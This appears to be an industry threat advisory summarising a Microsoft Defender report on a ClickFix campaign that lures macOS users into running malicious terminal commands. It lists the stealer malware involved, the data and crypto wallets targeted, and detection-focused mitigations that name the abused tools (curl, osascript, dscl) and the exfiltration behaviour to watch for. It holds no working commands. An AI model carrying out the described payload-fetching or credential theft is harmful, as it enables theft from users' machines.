Executive Summary
According to a report from the Microsoft Defender security research team published on 6 May 2026,an active “ClickFix” campaign is targeting macOS users through fake utility and troubleshooting lures. The campaign uses deceptive prompts masquerading as system fixes or macOS utilities to trick users into manually executing malicious terminal commands.
In the past two years, RH-ISAC membership has reported a steady volume of ClickFix activity targeting their brands, and members are encouraged to review the technical details below to maintain situational awareness around the ongoing developments in the ClickFix threat landscape.
Key Takeaways
- The campaign targets macOS users through fake utility and troubleshooting-themed lures.
- The campaign relies primarily on user interaction and deception rather than exploiting a software vulnerability.
- Observed malware payloads include Atomic macOS Stealer (AMOS), MacSync, and Shub Stealer.
- The malware can collect Keychain data, browser information, iCloud data, media files, and cryptocurrency wallet credentials.
- The malware was observed collecting sensitive user data, including browser credentials, notes, media files, Telegram data, cryptocurrency wallet information, Keychain entries, and iCloud account data.
- The malware targets multiple file types for exfiltration, including TXT, PDF, DOCX, wallet, key, JPEG, PNG, KDBX, RTF, and seed-related files.
- In some observed cases, legitimate cryptocurrency wallet applications were replaced with trojanized versions.
- The malware was observed targeting multiple cryptocurrency wallet applications for data theft and exfiltration, including Electrum, Exodus, Atomic, Ledger Live, Monero, Dogecoin, Trezor Suite, and Sparrow.
IOCs
The Microsoft Defender security research team has provided a list of indicators of compromises (IOCs) that can be found here: ClickFix IOCs
Mitigation Options
The Microsoft Defender security research team has provided the following mitigations:
- Educate users: Warn them against running instructions from untrusted sources.
- Monitor Terminal usage: Alert on suspicious Terminal or shell sessions spawned by installers or user apps.
- Detect native tool abuse: Flag unusual sequences of macOS utilities (curl, Base64, Gunzip, osascript, and dscl).
- Inspect outbound downloads: Monitor curl activity fetching encoded or compressed payloads from unknown domains.
- Protect credential stores: Detect unauthorized access to keychain items, browser data, SSH keys, and cloud credentials.
- Monitor data staging: Alert on archive creation of sensitive artifacts followed by HTTP POST exfiltration.
- Enable endpoint protection: Ensure macOS endpoint detection and response (EDR) or extended detection and response (XDR) monitors script execution and living‑off‑the‑land behavior.
- Restrict C2 traffic: Block outbound connections to suspicious or newly registered domains.
